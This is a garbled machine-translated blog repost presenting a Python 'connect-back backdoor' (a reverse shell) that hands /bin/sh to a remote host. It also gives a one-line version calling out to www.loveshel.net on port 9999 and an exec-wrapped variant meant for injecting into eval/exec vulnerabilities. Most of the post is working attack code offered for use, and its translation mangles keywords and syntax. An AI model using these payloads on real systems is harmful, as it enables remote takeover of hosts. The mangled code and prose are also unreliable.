I don't know why I suddenly want to see this.
The anti-shell code of python in the ego
#! /Usr/bin/Python
# Python connect-back Backdoor
# Author: wofeiwo <wofeiwo [0x40] Gmail [0x2e] COM>
# Version: 1.0
# Date: July 15th 2006
Import sys
Import OS
Import socket
Shell = "/bin/sh"
Def usage (programname ):
Print "Python connect-back backdoor"
Print "auther: wofeiwo <wofeiwo [0x40] Gmail [0x2e] COM>"
Print "Date: July 15th 2006/N"
Print "Usage: % S <conn_back_host> <port>/N" % programname
Def main ():
If Len (SYS. argv )! = 3:
Usage (SYS. argv [0])
SYS. Exit (1)
S = socket. socket (socket. af_inet, socket. sock_stream)
Try:
S. Connect (socket. gethostbyname (SYS. argv [1]), INT (SYS. argv [2])
Print "[+] connect OK ."
Except t:
Print "[-] cocould not connect to % s: % s" % (SYS. argv [1], SYS. argv [2])
SYS. Exit (2)
S. Send ("-------------------- Python connect-back backdoor ------------------/N ")
S. Send ("----------------------------- by wofeiwo -------------------------------/N ")
OS. dup2 (S. fileno (), 0)
OS. dup2 (S. fileno (), 1)
OS. dup2 (S. fileno (), 2)
Global Shell
OS. System (Shell)
Print "see u! "
S. Close ()
If _ name _ = "_ main _": Main ()
It is not good at exploiting vulnerabilities, is it? If we want to be short, save the following:
Import sys; import OS; import socket; S = socket. socket (socket. af_inet, socket. sock_stream); S. connect (socket. gethostbyname ("www.loveshel.net"), 9999); S. send ("Welcome my master/R/N"); OS. dup2 (S. fileno (), 0); OS. dup2 (S. fileno (), 1); OS. dup2 (S. fileno (), 2); S. send ("Is there a shell? /R/N "); OS. System ("/bin/bash "); S. Close (); S. Send (" see u next time! /R/N ");
How? It's very short, right?
However, it is very likely that many statements are not allowed where the vulnerability is exploited. For example, if the input is in Eval, multiple statements (which are explained later) cannot be modified.
Exec 'import sys; import OS; import socket; S = socket. socket (socket. af_inet, socket. sock_stream); S. connect (socket. gethostbyname ("www.loveshel.net"), 9999); S. send ("Welcome my master // R // n"); OS. dup2 (S. fileno (), 0); OS. dup2 (S. fileno (), 1); OS. dup2 (S. fileno (), 2); S. send ("Is there a shell? // R // n "); OS. System ("/bin/bash "); S. Close (); S. Send (" see u next time! // R // n ");';
Note: // R // n. Even if it seems like/R/N in '', it will become a line feed, so even if it is not needed here, code can be constructed. In addition, why not use eval?
I reviewed the manual
Exec statements are used to execute Python statements stored in strings or files. For example, we can generate a string containing Python code at runtime, and then execute these statements using exec statements.
The eval statement is used to calculate the valid Python expression stored in the string.
It seems that an error occurs when Eval is used.
YY, the idea is the same, but the specific language is different. How can we jump out of the language restrictions? It's a problem ......
This article from: the foot home (www.jb51.net) detailed source reference: http://www.jb51.net/html/200708/97/11135.htm